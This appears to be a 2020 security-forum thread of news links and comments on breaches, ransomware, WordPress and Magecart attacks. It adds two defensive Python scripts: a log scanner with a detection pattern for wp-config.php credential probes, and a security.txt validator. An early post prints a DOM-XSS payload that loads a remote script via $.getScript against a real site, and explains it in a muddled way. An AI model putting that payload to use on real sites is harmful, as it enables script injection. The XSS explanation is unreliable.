Read: https://blog.sucuri.net/2020/04/onetone-vulnerability-leads-to-javascript-cookie-hijacking.html
and
read: https://blog.nintechnet.com/unauthenticated-stored-xss-vulnerability-in-wordpress-onetone-theme-unpatched/
Word Press Content Management Software based on PHP, a constant pain in the proverbial parts. ;D
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Example of a vulnerable Word Press http website,
Remember WordPress is a weak and vulnerable CMS based on PHP,
see how vulnerable it can be to specific downgrade network attacks, random example:
via ",/$.getScript(%27https://localhost/test.js%27,function(){})" , which is a DOM-XSS attack ->
like here -htxp://paragon.net.uk/$.getScript(%27https://localhost/test.js%27,function(){}}
opening up to: -https://www.heg.com/wp-content/themes/renova/assets/js/bootstrap-modal.js?ver=4.9.13
which is a blacklisted site: https://sitecheck.sucuri.net/results/https/www.heg.com/wp-content/themes/renova/assets/js/bootstrap-modal.js?q=ver%3D4.9.13 (Outdated http://httpd.apache.org/security/vulnerabilities_22.html This is probably why this attack succeeded!).
Resulting in: Number of sources found: 41 ; Number of sinks found: 17
Source link: DOM XSS script -> script source: SANS Cyber Security Certs & Research.
An HTTPS Everywhere extension in your browser will block this URI inside the browser,
else a HEG main page may open up from HEG (= Host Europe Group), now part of GoDaddy.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Sawfish phishing campaign targets GitHub users
https://github.blog/2020-04-14-sawfish-phishing-campaign-targets-github-users/
-
A third of Tor Project staff have lost their jobs.
Read: https://blog.torproject.org/covid19-impact-tor
Coronavirus crisis & the "Globalonia forces" have quite some impact on the availability of reliable entry-nodes.
Many old sw-versions circulate with similarity hashes. Be aware!
Insecure onion addresses galore: -http://expyuzz4wqqyqhjn.onion/press/press.html
and -https://creep7nissfumwyx.onion/tor/press/press.html.en
polonus
-
Cognizant dot com hit by Maze-ransomware.
What is Maze? -> https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/
Read: https://news.cognizant.com/2020-04-18-cognizant-security-update
Background search on Intelligence X: https://intelx.io/?s=cognizant.com (interesting results?
e.g. abuse of Hong Kong domain for sale: https://www.sec.gov/litigation/admin/2014/34-73862.pdf )
polonus
-
267 million Facebook profiles sold for $600 on the dark web
https://www.bleepingcomputer.com/news/security/267-million-facebook-profiles-sold-for-600-on-the-dark-web/
-
NSA and ASD warn against Webshell cyberattacks and give advice as how to protect against such cyberthreats:
http://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/
polonus
-
Analysis and YARA rule: https://capesandbox.com/analysis/1118/
See: https://github.com/ctxis/CAPE/blob/master/data/yara/binaries/shellcodes.yar
Security Hole in ZyxelSecuManager attacked -
analysis: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
See: https://urlhaus.abuse.ch/host/irc.hoaxcalls.pw/
See the many vulnerabilities and flaws on the IP hoster: https://www.shodan.io/host/178.32.148.5
Consider also excessive server info proliferation there,
and https://security-tracker.debian.org/tracker/source-package/openssh
and https://www.cvedetails.com/vulnerability-list.php?vendor_id=23&product_id=0&version_id=0&page=1&hasexp=0&opdos=0&opec=0&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=0&cweid=0&order=1&trc=3197&sha=44f4e52af695bf3a090cd5aace57faab7e087bbf
& particularly enumeration user disclosure flaw...
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
French Subscribers to Famous News Site at Risk from Hacking, Fraud
https://www.safetydetectives.com/blog/lefigaro-leak-report/
-
Word Press CMS with 5 vulnerable extensions being attacked:
https://www.wordfence.com/blog/2020/05/nearly-a-million-wp-sites-targeted-in-large-scale-attacks/
polonus
-
A million Word-Press sites are at risk from an actively attacked hole in the Elementor-Pro plug-in.
Read: https://www.wordfence.com/blog/2020/05/combined-attack-on-elementor-pro-and-ultimate-addons-for-elementor-puts-1-million-sites-at-risk/
I have been warning against security issues with this a-priori insecure CMS, which often has outdated core code (old versions) based on the often can-of-worms PHP language, with many vulnerable or abandoned plug-ins and themes, often wrongly set default settings for user enumeration and directory listing, and outdated, retirable jQuery code libraries.
Automatic updating procedures may break your website code.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
And again approx. 1200 infections on webshops running a PHP based CMS - backtracking MageCart infections
Read:
https://maxkersten.nl/2020/05/06/backtracking-magecart-infections/ (info credits -> Max Kersten)
Scan here: https://www.magereport.com/ and stay fully updated and fully patched!
polonus
-
Hacker group selling databases with millions of user credentials busted in Poland and Switzerland
https://www.europol.europa.eu/newsroom/news/hacker-group-selling-databases-millions-of-user-credentials-busted-in-poland-and-switzerland
-
Top 10 Routinely Exploited Vulnerabilities | CISA (used by State actors and Cybercriminals alike):
https://www.us-cert.gov/ncas/alerts/aa20-133a
source: National Cyber Awareness System,
polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
-
1.3 million Word Press sites targeted by a single malcreant:
Re: https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/
Attacked were WP extensions like Easy2Map, Blog Designer, WP GDPR Compliance, Total Donations and also Newspaper-theme.
On one of the IP abused: https://intodns.com/bringtolightnyc.org Apache/2 E-Tag "2c-59c5c662ca35e"
polonus
-
The Unattributable leak your data: 23 million e-mail addresses leaked from a non-protected Elasticsearch-server.
But the original "scraper" cannot be defined and be held responsible as the cloud service does not provide us with names,
only gives out "unattributable". Cybercriminals often have more protection then legit end-users have. Sad but true fact.
Read: https://www.troyhunt.com/the-unattributable-db8151dd-data-breach/
polonus
-
North Korean Malicious Cyber Activity
https://www.us-cert.gov/northkorea
-
Interesting background analysis reads on REvil ransomware:
https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
& https://www.kpn.com/security-blogs/Tracking-REvil.htm
polonus
-
https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-15-2020-ee79ol/a-a27pt4o
-
Supercomputers hacked across Europe to mine cryptocurrency:
https://www.zdnet.com/article/supercomputers-hacked-across-europe-to-mine-cryptocurrency/
polonus
-
EasyJet hacked: data breach affects 9 million customers
https://www.bleepingcomputer.com/news/security/easyjet-hacked-data-breach-affects-9-million-customers/
http://otp.investis.com/clients/uk/easyjet1/rns/regulatory-story.aspx?cid=2&newsid=1391756
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/05/21/11/26/cYhrXOkd85/preview.jpg)
-
Polonus stumbled upon this http-address in France: http://perso102-g5.free.fr/info.php
Not being secure and wondering what was goin' on there, we scanned IP: https://www.shodan.io/host/212.27.63.102 -> leading to: -http://perso102-g5.free.fr/info.php
Re: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cHt9c10xMDItZzUuZn17ey5mfWBbbmZdLnBocA%3D%3D~enc
Vulnerable SSL OpenSSL, headers - 1.0.1t 7.8 vulnerabilities:
code found: https://www.openssl.org/news/vulnerabilities.html via vulners extension in the browser.
Seems this route is (ab)used for ad-monetizing activities via Akidom service over insecure connections.
There is a lot going on under the hood in the browser, the average user is not aware of,
that is why polonus now and then dares to take a glimpse of what is going on there ;)
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Home Chef announces data breach after hacker sells 8M user records
https://www.bleepingcomputer.com/news/security/home-chef-announces-data-breach-after-hacker-sells-8m-user-records/
https://support.homechef.com/hc/en-us/sections/360008878052-Home-Chef-Data-Security-Incident
-
FBI warns Magento webshops of attacks via the MAGMI Data Import Tool.
Considering: https://nvd.nist.gov/vuln/detail/CVE-2017-7391
What can be done to use Magmi Data Import Tool in a more secure way:
https://magentary.com/kb/securing-magmi-data-import-tool/
Before venturing out to a webshop or as a webshop site owner or admin just scan here for insecurity:
https://www.magereport.com
Still one-box-solution-vendors standing in the shadow luring to use their product, read:
https://firebearstudio.com/blog/magento-2-magmi-integration.html
They also support integration of phased-out insecure magento-1. :o
On that address@ firebearstudio dot com website they also use vulnerable PHP, headers - 7.2.18.
Not a real recommendation i.m.h.o.
polonus
-
Hacker shares 40 million Wishbone user records for free
https://www.bleepingcomputer.com/news/security/hacker-shares-40-million-wishbone-user-records-for-free/
-
Voter info for millions of Indonesians shared on hacker forum
https://www.bleepingcomputer.com/news/security/voter-info-for-millions-of-indonesians-shared-on-hacker-forum/
-
Mathway investigates data breach after 25M records sold on dark web
https://www.bleepingcomputer.com/news/security/mathway-investigates-data-breach-after-25m-records-sold-on-dark-web/
-
@Asyn,
I'm beginning to feel like I should be going to Bleeping Computers?
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/05/23/12/55/cYh0lNkWOm/preview.jpg)
https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-15-2020-ee79ol/a-a27pt4o
-
Getting too little notice: Sarwent Malware Continues to Evolve:
Re: https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
Research by Jason Reaves (info credits go there),
Malware opens up RDP-firewall-port and has TrickBot like actions.
polonus
-
26 million LiveJournal accounts being shared on hacker forums
https://www.bleepingcomputer.com/news/security/26-million-livejournal-accounts-being-shared-on-hacker-forums/
-
SANDWORM ACTORS EXPLOITING VULNERABILITY IN EXIM MAIL TRANSFER AGENT
https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/01/12/16/cY1VlDpg3f/preview.jpg)
https://anchor.fm/norbert-gostischa/episodes/Weekly-Security-News-Roundup-WE-5-29-2020-eern4i
-
SANDWORM ACTORS EXPLOITING VULNERABILITY IN EXIM MAIL TRANSFER AGENT
https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf
Russian Actors Are Targeting Vulnerable Exim Mail Servers. Patching Is Up, but More Than 900k Remain Online
https://www.riskiq.com/blog/labs/vulnerable-exim-mail-servers/
-
Attackers - Large scale attack campaign targets database credentials - database password,
Re: https://www.wordfence.com/blog/2020/06/large-scale-attack-campaign-targets-database-credentials/
What they were after is wp-config.php file which may hold particular credentials:
https://www.shodan.io/search?query=wp-config.php
Example some http:// IP address -/wordpress/wp-admin/setup-config.php
Response headers PHP/7.2.29 on Apache/2.4.43 (Win64)
PHP header vulnerabilities found (score 5 each):
CVE-2019-11048: In PHP versions 7.2.x below 7.2.31, 7.3.x below 7.3.18 and 7.4.x below 7.4.6, when HTTP file uploads are allowed, supplying overly long filenames or field names could lead PHP engine to try to allocate oversized memory storage, hit the memory limit and stop processing the request, without cleaning up temporary files created by upload request. This potentially could lead to accumulation of uncleaned temporary files exhausting the disk space on the target server.
CVE-2018-19935: ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function.
CVE-2020-7067: In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), urldecode() function can be made to access locations past the allocated memory, due to erroneously using signed numbers as array indexes.
One of such Mystery-groups involved from Perm: https://siterankdata.com/mystery-group.ru
One of the addresses - Network: https://www.shodan.io/host/31.131.251.113
see activities of May 31st last: https://www.abuseipdb.com/check/31.131.251.113
and from France IP-address involved: https://www.shodan.io/host/188.165.195.184
Address coming soon: - 188.165.195.184 - -otzyvysotrudnikov.xyz — Coming Soon
ending in xyz: https://www.abuseipdb.com/check/188.165.195.184
and https://www.projecthoneypot.org/ip_188.165.196.25 (malspider)
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
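Added example (not from the post above or from Wordfence): a small log-scan a site admin can run over a web server access log to see whether their own site is being probed for wp-config.php and setup-config.php, the files named in the post. The log lines are constructed and the backup suffixes (.bak, .old, ~ and so on) are an assumption added here.

```python
import re
from collections import Counter

# Apache/nginx "combined" access-log line:
# ip - - [timestamp] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Requests for these paths are reconnaissance for database credentials: a healthy
# site never serves them to anonymous visitors. The backup/editor suffixes are an
# assumption added in this example, not something the post states.
SENSITIVE_RE = re.compile(
    r'/wp-config\.php(?:\.(?:bak|old|orig|save|swp|txt)|~)?$'
    r'|/wp-admin/setup-config\.php$',
    re.IGNORECASE,
)


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_config_probes(lines):
    """One finding per request that touches a credential-bearing path."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]          # ignore the query string
        if not SENSITIVE_RE.search(path):
            continue
        # A 200 on a wp-config copy means the file was served as plain text.
        served = rec["status"] == "200" and "wp-config" in path.lower()
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": path,
                         "status": rec["status"], "served": served})
    return findings


def top_sources(findings, n=5):
    """Most active source IPs: the natural input for a block list or an abuse report."""
    return Counter(f["ip"] for f in findings).most_common(n)


# Constructed sample log (documentation IP ranges, not real attackers).
SAMPLE_LOG = """\
203.0.113.5 - - [31/May/2020:10:12:01 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.5 - - [31/May/2020:10:12:02 +0000] "GET /wordpress/wp-admin/setup-config.php?step=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [31/May/2020:10:12:03 +0000] "GET /wp-config.php~ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.7 - - [31/May/2020:10:15:40 +0000] "GET /blog/wp-config.php.old HTTP/1.1" 200 3111 "-" "curl/7.68.0"
192.0.2.44 - - [31/May/2020:10:16:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.44 - - [31/May/2020:10:16:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 83 "https://example.org/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    probes = find_config_probes(SAMPLE_LOG.splitlines())
    for p in probes:
        flag = "SERVED!" if p["served"] else ""
        print(f'{p["ip"]:15} {p["status"]} {p["path"]} {flag}')
    print("top sources:", top_sources(probes))
```

Any hit with "served" set means a plain-text copy of the configuration left the server; rotate the database password and remove the stray file before anything else. A 404 or 403 still tells you who is scanning.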
-
CPA Canada discloses data breach affecting 329,000 individuals
https://www.bleepingcomputer.com/news/security/cpa-canada-discloses-data-breach-affecting-329-000-individuals/
https://www.newswire.ca/news-releases/cpa-canada-provides-notice-of-data-security-incident-829517999.html
-
IPAS: Security Advisories for June 2020
https://blogs.intel.com/technology/2020/06/ipas-security-advisories-for-june-2020/
-
Increased Use of Mobile Banking Apps Could Lead to Exploitation
https://www.ic3.gov/media/2020/200610.aspx
-
FortiGuard Labs Discovers Privilege Escalation Vulnerability in Windows 10 Platform
https://www.fortinet.com/blog/threat-research/fortiguard-labs-security-researcher-discovers-privilege-escalation-vulnerability-in-windows-platform
-
6 New Vulnerabilities Found on D-Link Home Routers
https://unit42.paloaltonetworks.com/6-new-d-link-vulnerabilities-found-on-home-routers/
-
Weekly Security News Roundup w/e 6-12-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/15/17/34/cY1ob4Cx7p/preview.jpg) (https://youtu.be/XDaN6Ua45Dg)
https://youtu.be/XDaN6Ua45Dg
-
79 Netgear router models risk full takeover due to unpatched bug
https://www.bleepingcomputer.com/news/security/79-netgear-router-models-risk-full-takeover-due-to-unpatched-bug/
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/19/16/06/cY1qD1CHNV/preview.jpg)
-
Massive spying on users of Google's Chrome shows new security weakness
https://www.reuters.com/article/us-alphabet-google-chrome-exclusive/exclusive-massive-spying-on-users-of-googles-chrome-shows-new-security-weakness-idUSKBN23P0JO?utm_medium=Social&utm_source=twitter
https://awakesecurity.com/blog/the-internets-new-arms-dealers-malicious-domain-registrars/
-
Avast CEO, Ondrej Vlcek discusses the increase in cyber attacks
during the COVID-19 crisis and the rise in social engineering attacks.
https://ava.st/3epCDuR
-
Security Bulletin: NVIDIA GPU Display Driver - June 2020
https://nvidia.custhelp.com/app/answers/detail/a_id/5031/kw/Security%20Bulletin
-
Security Bulletin: NVIDIA GPU Display Driver - June 2020
https://nvidia.custhelp.com/app/answers/detail/a_id/5031/kw/Security%20Bulletin
A bit of a pain, I had just downloaded the latest NVIDIA GPU Display Driver a few days ago. Hoping to get past the win10 2004 update, device not yet ready comment.
I really don't like updating drivers (not a gamer) as they have this nasty habit of screwing up, just started downloading this one.
-
‘BlueLeaks’ Exposes Files from Hundreds of Police Departments
https://krebsonsecurity.com/2020/06/blueleaks-exposes-files-from-hundreds-of-police-departments/
-
Enormous increase in the number of PHISHING-sites.
Most damage is being done in the initial hours when such sites have not yet been reported to be added to reputation lists.
Then it can also be days before they have been crossed out at registrars.
The security industry could play a more active role before abuse reports take effect to block them from the word go.
polonus
-
Hakbit Ransomware Campaign Against Germany, Austria, Switzerland
https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland
-
Weekly Security News Roundup w/e 6-26-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/06/29/12/12/cY1Ull52aJ/preview.jpg) (https://youtu.be/tTep3ALpVhY)
https://youtu.be/tTep3ALpVhY
-
Seller floods hacker forum with data stolen from 14 companies
https://www.bleepingcomputer.com/news/security/seller-floods-hacker-forum-with-data-stolen-from-14-companies/
-
Roblox accounts being hacked in support of Trump reelection
https://www.bleepingcomputer.com/news/security/roblox-accounts-being-hacked-in-support-of-trump-reelection/
-
‘BlueLeaks’ Exposes Files from Hundreds of Police Departments
https://krebsonsecurity.com/2020/06/blueleaks-exposes-files-from-hundreds-of-police-departments/
How the BlueLeaks data breach happened
https://blog.avast.com/understanding-blueleaks-avast
-
Dismantling of an encrypted network sends shockwaves through organised crime groups across Europe
https://www.europol.europa.eu/newsroom/news/dismantling-of-encrypted-network-sends-shockwaves-through-organised-crime-groups-across-europe
-
Weekly Security News Roundup w/e 7-3-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/07/06/14/26/cYi12O5an0/preview.jpg) (https://youtu.be/eB5-XUhkmew)
https://youtu.be/eB5-XUhkmew
-
Beware “secure DNS” scam targeting website owners and bloggers
https://nakedsecurity.sophos.com/2020/06/29/beware-secure-dns-scam-targeting-website-owners-and-bloggers/
-
Keeper's card-skimming Magecart:
https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf
Read: https://www.theregister.com/2020/07/07/keeper_crew_magecart/
Right now, the injection-and-collection server remains active,
though a Gemini Advisory spokesperson told The Register it has alerted law enforcement.
polonus
-
Mozilla suspends Firefox Send service while it addresses malware abuse
https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
-
Mozilla suspends Firefox Send service while it addresses malware abuse
https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
Interesting, I use Firefox and I had never heard of this Firefox Send tool :)
-
L.S.
Open-source package vulnerabilities: https://www.theregister.com/2020/06/26/open_source_security_snyk_survey/
report: https://snyk.io/open-source-security-report/
Re: https://snyk.io/vuln
polonus
-
3.4M LiveAuctioneers users’ PII and cracked passwords for sale on data sharing forum
https://cloudsek.com/threatintelligence/3-4-m-liveauctioneers-users-pii-and-cracked-passwords-for-sale-on-data-sharing-forum/
https://help.liveauctioneers.com/article/496-july-11-2020-liveauctioneers-account-security
-
Records of 45 Million+ travelers to Thailand and Malaysia Leaked on Darkweb!!
https://cybleinc.com/2020/07/12/records-of-45-million-travelers-to-thailand-and-malaysia-leaked-on-darkweb/
-
Weekly Security News Roundup w/e 7-10-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/07/15/17/54/cYiobLEn1c/preview.jpg) (https://youtu.be/lDtHvpDAcFs)
https://youtu.be/lDtHvpDAcFs
-
Apple, Kanye, Gates, Bezos, more hacked in Twitter account crypto scam
https://www.bleepingcomputer.com/news/security/apple-kanye-gates-bezos-more-hacked-in-twitter-account-crypto-scam/
-
Apple, Kanye, Gates, Bezos, more hacked in Twitter account crypto scam
https://www.bleepingcomputer.com/news/security/apple-kanye-gates-bezos-more-hacked-in-twitter-account-crypto-scam/
Scammers hacked Twitter and hijacked accounts using admin tool
https://www.bleepingcomputer.com/news/security/scammers-hacked-twitter-and-hijacked-accounts-using-admin-tool/
-
Emotet botnet returns after a five-month absence
https://www.zdnet.com/article/emotet-botnet-returns-after-a-five-month-absence/
-
“Zero logs” VPN exposes millions of logs including user passwords, claims data is anonymous
https://www.comparitech.com/blog/vpn-privacy/ufo-vpn-data-exposure/
Report: No-Log VPNs Exposed Users’ Logs and Personal Details for All to See
https://www.vpnmentor.com/blog/report-free-vpns-leak/
-
Garmin services and production go down after ransomware attack.
Details here (https://www.zdnet.com/article/garmin-services-and-production-go-down-after-ransomware-attack/?ftag=TRE-03-10aaa6b&bhid=20703016557828276829617940745163&mid=12944999&cid=717091465&fbclid=IwAR0KjA5gSu7U2WpipstUmTgUNDMS_u0wsUp5uMpxWyHV0XAGTUTbOoyYf4o)
-
FBI warns US companies about backdoors in Chinese tax software
https://www.zdnet.com/article/fbi-warns-us-companies-about-backdoors-in-chinese-tax-software/
-
Source code from dozens of companies leaked online
https://www.bleepingcomputer.com/news/security/source-code-from-dozens-of-companies-leaked-online/
-
Additionally to what bob3160 wrote on Garmin's interruptions:
Update: https://status.inreach.garmin.com/
Garmin leaked internal memo on iThome.com [article in Taiwanese --> Google Translate]
-> https://archive.is/https://www.ithome.com.tw/news/139004
Alternative product to use: https://www.vernier.com/product/labquest-2/
polonus
-
Weekly Security News Roundup w/e 7/24/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/07/27/13/56/cYitI8EAi9/preview.jpg) (https://youtu.be/9SQ9Zdv0hgU)
https://youtu.be/9SQ9Zdv0hgU
-
Potential Legacy Risk from Malware Targeting QNAP NAS Devices
https://us-cert.cisa.gov/ncas/alerts/aa20-209a
-
Mobile banking-app Dave leaks data of 2.9 million users.
Here we can see who's "really lost" in this case: https://dave.com/.well-known/security.txt ;)
Read on this security.txt initiative for security policy standard researchers: https://securitytxt.org/
and spread the word.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
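Added example, not part of the post above: a validator for a security.txt file of the kind the post points at. It checks the rules of the standard that was later published as RFC 9116 (Contact and Expires required, Expires at most once and not in the past, Contact values as URIs, Canonical over https). Both input files are constructed for the example; fetching the real file from /.well-known/security.txt is left to the reader.

```python
from datetime import datetime, timedelta, timezone

REQUIRED = ("Contact", "Expires")                  # both mandatory in RFC 9116
SINGLETONS = ("Expires", "Preferred-Languages")    # may appear at most once
CONTACT_SCHEMES = ("mailto:", "tel:", "https://")  # Contact values must be URIs


def parse_security_txt(text):
    """Collect 'Field: value' lines into {field: [values]}; comments and blanks are skipped."""
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        name, _, value = line.partition(":")     # split on the FIRST colon only
        fields.setdefault(name.strip(), []).append(value.strip())
    return fields


def validate_security_txt(text, now=None):
    """Return a list of problems; an empty list means a researcher can rely on the file."""
    now = now or datetime.now(timezone.utc)
    fields = parse_security_txt(text)
    problems = []
    for name in REQUIRED:
        if name not in fields:
            problems.append(f"missing required field: {name}")
    for name in SINGLETONS:
        if len(fields.get(name, [])) > 1:
            problems.append(f"field must appear only once: {name}")
    for value in fields.get("Contact", []):
        if not value.lower().startswith(CONTACT_SCHEMES):
            problems.append(f"Contact is not a mailto:/tel:/https: URI: {value}")
    for value in fields.get("Expires", [])[:1]:
        try:
            expires = datetime.fromisoformat(value.replace("Z", "+00:00"))
        except ValueError:
            problems.append(f"Expires is not an ISO 8601 timestamp: {value}")
            continue
        if expires.tzinfo is None:
            problems.append("Expires has no time zone")
        elif expires <= now:
            problems.append(f"file expired on {value}; its contact data is stale")
        elif expires > now + timedelta(days=365):
            problems.append("Expires is more than a year out; RFC 9116 recommends under a year")
    for value in fields.get("Canonical", []):
        if not value.startswith("https://"):
            problems.append(f"Canonical URL is not https: {value}")
    return problems


# Constructed files for the example; example.com is not a real policy.
GOOD_TXT = """\
# Security policy of example.com (constructed)
Contact: mailto:security@example.com
Contact: https://example.com/security-contact
Expires: 2021-03-01T00:00:00Z
Canonical: https://example.com/.well-known/security.txt
Preferred-Languages: en, nl
"""

BAD_TXT = """\
Contact: security@example.com
Canonical: http://example.com/.well-known/security.txt
"""

# Fixed "now" so the result does not depend on when the script is run.
NOW = datetime(2020, 8, 1, tzinfo=timezone.utc)

if __name__ == "__main__":
    print("good:", validate_security_txt(GOOD_TXT, NOW) or "no problems")
    print("bad: ", validate_security_txt(BAD_TXT, NOW))
```

The first colon rule in parse_security_txt matters: "Contact: mailto:x@y" and "Canonical: https://..." both contain further colons that belong to the value.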
-
Hacker leaks 386 million user records from 18 companies for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/
-
Hacker leaks 386 million user records from 18 companies for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/
If leaking this information is illegal, and apparently BleepingComputer is able to 'talk' to this hacker, I wonder if
BleepingComputer has an obligation to report this to the authorities? I wonder if they've done that?
-
Hacker leaks 386 million user records from 18 companies for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/
If leaking this information is illegal, and apparently BleepingComputer is able to 'talk' to this hacker, I wonder if
BleepingComputer has an obligation to report this to the authorities? I wonder if they've done that?
Or be complicit ?
-
Apple, Kanye, Gates, Bezos, more hacked in Twitter account crypto scam
https://www.bleepingcomputer.com/news/security/apple-kanye-gates-bezos-more-hacked-in-twitter-account-crypto-scam/
Scammers hacked Twitter and hijacked accounts using admin tool
https://www.bleepingcomputer.com/news/security/scammers-hacked-twitter-and-hijacked-accounts-using-admin-tool/
Florida Teenager Is Charged as ‘Mastermind’ of Twitter Hack
https://www.nytimes.com/2020/07/31/technology/twitter-hack-arrest.html
-
Newsletter Plugin Vulnerabilities Affect Over 300,000 Sites
https://www.wordfence.com/blog/2020/08/newsletter-plugin-vulnerabilities-affect-over-300000-sites/
-
Hacker leaks passwords for 900+ enterprise VPN servers
https://www.zdnet.com/article/hacker-leaks-passwords-for-900-enterprise-vpn-servers/
-
How to detect malicious webshop websites?
Read: https://www.ic3.gov/media/2020/200803.aspx
There are plenty of ways to check online whether a webshop is to be trusted, like scamadviser, UrlVoid, Trustpilot, etc.
Mozilla Observatory. HTTP-downgraded websites are suspicious. Also constructions like WW2 etc.
Brand new registrations, whois data through 3rd parties.
Misspellings and grammatical errors.
Often cybercriminals give themselves away in such ways.
When something seems too good to be true, then that might really be the case.
Always use your common sense under all circumstances.
polonus
-
Critical Vulnerability Exposes over 700,000 Sites Using Divi, Extra, and Divi Builder
https://www.wordfence.com/blog/2020/08/critical-vulnerability-exposes-over-700000-sites-using-divi-extra-and-divi-builder/
-
Intel investigating breach after 20GB of internal documents leak online
https://www.zdnet.com/article/intel-investigating-breach-after-20gb-of-internal-documents-leak-online/
-
US shares info on election interference tied to Russia, China, Iran
https://www.bleepingcomputer.com/news/security/us-shares-info-on-election-interference-tied-to-russia-china-iran/
-
Weekly Security News Roundup w/e 8-7-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/11/12/00/cYjXlcGTb7/preview.jpg) (https://youtu.be/uriyhbdMkbY)
https://youtu.be/uriyhbdMkbY
-
Canon USA's stolen files leaked by Maze ransomware gang
https://www.bleepingcomputer.com/news/security/canon-usas-stolen-files-leaked-by-maze-ransomware-gang/
-
Does Google have the intention of phasing out URLs completely in the browser?
See: https://blog.chromium.org/2020/08/helping-people-spot-spoofs-url.html
Research: https://research.google/pubs/pub49166/
Who are the real authorities to decide this? Protocol authorities or Big Tech from Silicon Valley or Silicon Forest?
End users may never learn not to click a ww2.somecybercriminaldomain dot com or ending in su (Soviet Union, often used by malcreants).
polonus
-
Does Google have the intention of phasing out URLs completely in the browser?
See: https://blog.chromium.org/2020/08/helping-people-spot-spoofs-url.html
Research: https://research.google/pubs/pub49166/
Who are the real authorities to decide this? Protocol authorities or Big Tech from Silicon Valley or Silicon Forest?
End users may never learn not to click a ww2.somecybercriminaldomain dot com or ending in su (Soviet Union, often used by malcreants).
polonus
I'm not sure which I like least, Google's involvement in this so-called solution or the domain name spoofing problem.
If you arrive at a spoofed address in the first place it really is too late. Always check links before you click, especially in emails or on other websites; I always hover over links in emails or the browser to display the underlying URL.
The first solution to this issue sits in the chair in front of the screen (or PEBCAK) :D
-
Drovorub malware attacking linux systems: See: https://www.theregister.com/2020/08/13/drovorub_nsa_fbi/
Read:
https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/
Also: https://blog.cygenta.co.uk/drovorub-apt/
Such malware has been with us since 2015. It is all feasible because of the monolithic character of the Linux kernel,
that manages all resources like processes and access to devices.
Compare it with loadable device malcode from the Microsoft DOS period via the "string" command.
It works through modification and manipulation of a dynamic LKM (loadable kernel module).
